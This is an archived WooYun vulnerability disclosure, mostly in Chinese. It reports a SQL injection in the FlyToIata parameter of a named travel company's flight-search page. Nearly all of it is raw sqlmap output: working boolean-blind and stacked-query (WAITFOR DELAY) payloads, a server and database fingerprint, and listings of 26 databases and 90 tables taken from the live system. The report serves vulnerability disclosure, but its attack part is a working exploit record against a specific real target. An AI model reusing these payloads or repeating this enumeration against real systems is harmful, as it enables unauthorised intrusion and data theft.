乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-30: 厂商已经主动忽略漏洞,细节向公众公开
注入
注入点
http://online.omegatravel.net/flight_dynamic.aspx?FlyToIata=BKK
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: FlyToIata (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: FlyToIata=BKK' AND 7403=7403 AND 'Ozwu'='Ozwu Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: FlyToIata=BKK';WAITFOR DELAY '0:0:10'-----web server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2008available databases [26]:[*] dbErbeds[*] dbflights_omega[*] dbflights_omega_test[*] dbgmhfares[*] dbholidaybrokers_master[*] dblowcostbeds[*] dbmedhotels_master[*] dbOmega_Pay[*] dbomegafares[*] dbyoutravel_master[*] destinations[*] destinations_test[*] gmh_ws[*] lclassdb[*] markup_gmh[*] markup_omega[*] markup_omega_test[*] master[*] model[*] msdb[*] omega_ws[*] omega_ws_test[*] search_data_bo_omega[*] search_data_omega[*] tempdb[*] track_data_omegasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: FlyToIata (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: FlyToIata=BKK' AND 7403=7403 AND 'Ozwu'='Ozwu Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: FlyToIata=BKK';WAITFOR DELAY '0:0:10'-----web server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2008Database: omega_ws[90 tables]+-----------------------+| PTC_ADT_only || api_config || booking_error_flights || low_fares || nonbook_airlines || nonbook_airports || nonbook_faretype || nonbook_route || onlybook_airlines || tax_offset || tblAirportCodes || verify || verify_details || ws_data || ws_data_20140709 || ws_data_20140714 || ws_data_20140722 || ws_data_20140810 || ws_data_20140917 || ws_data_20140930 || ws_data_20141010 || ws_data_20141011 || ws_data_20141022 || ws_data_20141102 || ws_data_20141114 || ws_data_20141201 || ws_data_20141210 || ws_data_20141221 || ws_data_20141226 || ws_data_20141230 || ws_data_20150103 || ws_data_20150107 || ws_data_20150111 || ws_data_20150115 || ws_data_20150119 || ws_data_20150123 || ws_data_20150127 || ws_data_20150131 || ws_data_20150204 || ws_data_20150208 || ws_data_20150212 || ws_data_20150216 || ws_data_20150220 || ws_data_20150224 || ws_data_20150228 || ws_data_20150304 || ws_data_20150330 || ws_data_20150405 || ws_data_20150409 || ws_data_20150413 || ws_data_20150417 || ws_data_20150421 || ws_data_20150425 || ws_data_20150429 || ws_data_20150503 || ws_data_20150507 || ws_data_20150511 || ws_data_20150515 || ws_data_20150519 || ws_data_20150523 || ws_data_20150527 || ws_data_20150531 || ws_data_20150604 || ws_data_20150608 || ws_data_20150612 || ws_data_20150616 || ws_data_20150620 || ws_data_20150624 || ws_data_20150628 || ws_data_20150702 || ws_data_20150706 || ws_data_20150710 || ws_data_20150714 || ws_data_20150715 || ws_data_20150718 || ws_data_20150722 || ws_data_20150726 || ws_data_20150730 || ws_data_20150803 || ws_data_20150807 || ws_data_20150811 || ws_data_20150815 || ws_data_20150819 || ws_data_20150823 || ws_data_20150827 || ws_data_20150831 || ws_data_20150904 || ws_data_20150908 || ws_data_20150912 || ws_data_temp |+-----------------------+
- -
未能联系到厂商或者厂商积极拒绝